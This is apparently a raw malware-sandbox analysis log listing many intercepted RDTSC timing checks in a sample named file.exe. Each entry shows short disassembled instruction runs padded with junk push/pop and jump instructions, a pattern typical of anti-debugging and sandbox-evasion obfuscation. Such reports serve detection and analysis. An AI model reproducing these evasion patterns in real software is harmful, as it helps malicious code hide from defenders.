Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0200F second address: D0202B instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9278BE2826h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d jnp 00007F9278BE2836h 0x00000013 pushad 0x00000014 jng 00007F9278BE2826h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D01071 second address: D01079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D011D2 second address: D011F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jc 00007F9278BE2826h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9278BE282Eh 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D011F0 second address: D011F6 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0132C second address: D01332 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D01332 second address: D0133A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0133A second address: D01371 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jp 00007F9278BE2838h 0x0000000d jmp 00007F9278BE2830h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F9278BE2830h 0x0000001b jp 00007F9278BE2826h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D017A4 second address: D017B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007F927881D806h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0190A second address: D0190E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0190E second address: D01930 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F927881D816h 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D01930 second address: D01934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D01934 second address: D01938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D01A7E second address: D01A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D01A82 second address: D01ABA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 js 00007F927881D806h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F927881D80Ch 0x00000013 jp 00007F927881D81Eh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D01ABA second address: D01ABF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D01ABF second address: D01AD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F927881D806h 0x0000000a popad 0x0000000b jnp 00007F927881D80Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D038BC second address: D038C2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D038C2 second address: D038C7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0374F second address: D03759 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D08FEA second address: D08FF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jno 00007F927881D806h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D08FF6 second address: D09012 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2838h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D09012 second address: D09018 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0ACBE second address: D0ACC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: D0ACC2 second address: D0ACC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC00BF second address: 4DC00C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC00C5 second address: 4DC011E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F927881D80Eh 0x00000011 push eax 0x00000012 pushad 0x00000013 call 00007F927881D811h 0x00000018 pushfd 0x00000019 jmp 00007F927881D810h 0x0000001e sbb ah, FFFFFFF8h 0x00000021 jmp 00007F927881D80Bh 0x00000026 popfd 0x00000027 pop esi 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC011E second address: 4DC012B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 xchg eax, ebp 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC012B second address: 4DC014B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D814h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC014B second address: 4DC014F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC014F second address: 4DC0155 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DA0CB6 second address: 4DA0CC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9278BE282Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DA0CC9 second address: 4DA0D0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F927881D814h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov bx, ax 0x00000013 mov ebx, ecx 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 jmp 00007F927881D814h 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DA0D0B second address: 4DA0D0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DA0D0F second address: 4DA0D15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DA0D15 second address: 4DA0D1A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DF0459 second address: 4DF04A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F927881D80Fh 0x00000009 and ax, 9B9Eh 0x0000000e jmp 00007F927881D819h 0x00000013 popfd 0x00000014 call 00007F927881D810h 0x00000019 pop ecx 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push ebx 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 mov di, ax 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DF04A6 second address: 4DF04B9 instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 mov ecx, ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DF04B9 second address: 4DF04DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 call 00007F927881D810h 0x0000000c pushad 0x0000000d popad 0x0000000e pop ecx 0x0000000f popad 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DF04DC second address: 4DF04E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DF04E0 second address: 4DF04E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D80174 second address: 4D8019A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2831h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F9278BE282Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D8019A second address: 4D801B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D811h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D801B6 second address: 4D801CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop ecx 0x00000010 mov edi, 579BE08Ah 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D801CC second address: 4D801E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F927881D817h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D8022B second address: 4D8022F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4D8022F second address: 4D80235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DA09ED second address: 4DA0A01 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 5A79A209h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov eax, edx 0x00000011 push edx 0x00000012 pop esi 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DA05CE second address: 4DA05D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DA04E5 second address: 4DA04E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DA04E9 second address: 4DA0564 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F927881D816h 0x00000008 jmp 00007F927881D815h 0x0000000d popfd 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 xchg eax, ebp 0x00000012 pushad 0x00000013 pushad 0x00000014 mov ah, FCh 0x00000016 mov ebx, 48DF627Ah 0x0000001b popad 0x0000001c pushfd 0x0000001d jmp 00007F927881D80Bh 0x00000022 add eax, 2D337E1Eh 0x00000028 jmp 00007F927881D819h 0x0000002d popfd 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007F927881D80Dh 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DA0280 second address: 4DA0294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9278BE2830h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DA0294 second address: 4DA0298 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DB00F7 second address: 4DB00FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DB00FD second address: 4DB0123 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, 0Ah 0x00000005 mov di, 833Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F927881D817h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DB0123 second address: 4DB015C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F9278BE282Fh 0x00000008 pop eax 0x00000009 call 00007F9278BE2839h 0x0000000e pop esi 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov dword ptr [esp], ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DB015C second address: 4DB0174 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D814h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DB0174 second address: 4DB01A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE282Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F9278BE2836h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DB01A2 second address: 4DB01A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DB01A6 second address: 4DB01AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DF03DE second address: 4DF03E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DF03E4 second address: 4DF042C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE282Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov edi, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushfd 0x00000011 jmp 00007F9278BE2838h 0x00000016 jmp 00007F9278BE2835h 0x0000001b popfd 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC0444 second address: 4DC0461 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D819h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC0461 second address: 4DC0467 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC0467 second address: 4DC046B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC046B second address: 4DC04AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebp+08h] 0x0000000b jmp 00007F9278BE282Fh 0x00000010 and dword ptr [eax], 00000000h 0x00000013 jmp 00007F9278BE2836h 0x00000018 and dword ptr [eax+04h], 00000000h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f mov si, di 0x00000022 mov ebx, 62EE6F0Ch 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC04AE second address: 4DC04C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F927881D811h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DA0423 second address: 4DA0484 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F9278BE2836h 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F9278BE2830h 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 mov esi, 0976128Dh 0x0000001c mov ah, 4Ah 0x0000001e popad 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov esi, 7C5DB8FDh 0x00000028 pushfd 0x00000029 jmp 00007F9278BE282Ah 0x0000002e and cx, A5D8h 0x00000033 jmp 00007F9278BE282Bh 0x00000038 popfd 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC0054 second address: 4DC0058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC0058 second address: 4DC005C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC005C second address: 4DC0062 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC0062 second address: 4DC006B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 9C51h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC0279 second address: 4DC02AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D819h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 jmp 00007F927881D80Fh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC02AD second address: 4DC02C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9278BE2834h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC02C5 second address: 4DC0314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D80Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F927881D816h 0x00000011 mov ebp, esp 0x00000013 jmp 00007F927881D810h 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c jmp 00007F927881D80Dh 0x00000021 mov di, si 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DC0314 second address: 4DC0319 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0773 second address: 4DE077C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ax, 1E7Fh 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE077C second address: 4DE07A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2835h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F9278BE282Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE07A5 second address: 4DE07F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, dx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F927881D816h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F927881D810h 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a jmp 00007F927881D80Dh 0x0000001f popad 0x00000020 xchg eax, ecx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F927881D80Dh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE07F9 second address: 4DE07FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE07FF second address: 4DE0803 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0803 second address: 4DE0807 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0807 second address: 4DE0827 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F927881D815h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0827 second address: 4DE082D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE082D second address: 4DE0878 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D813h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c pushad 0x0000000d popad 0x0000000e mov eax, dword ptr [778165FCh] 0x00000013 jmp 00007F927881D80Ch 0x00000018 test eax, eax 0x0000001a jmp 00007F927881D810h 0x0000001f je 00007F92EB1D0900h 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0878 second address: 4DE0895 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9278BE2839h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE0895 second address: 4DE08EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F927881D811h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b pushad 0x0000000c movzx ecx, di 0x0000000f mov ax, di 0x00000012 popad 0x00000013 xor eax, dword ptr [ebp+08h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 push edi 0x0000001a pop esi 0x0000001b pushfd 0x0000001c jmp 00007F927881D819h 0x00000021 adc si, AF86h 0x00000026 jmp 00007F927881D811h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE08EE second address: 4DE08F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE08F4 second address: 4DE08F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE09F1 second address: 4DE09F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4DE09F7 second address: 4DE09FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
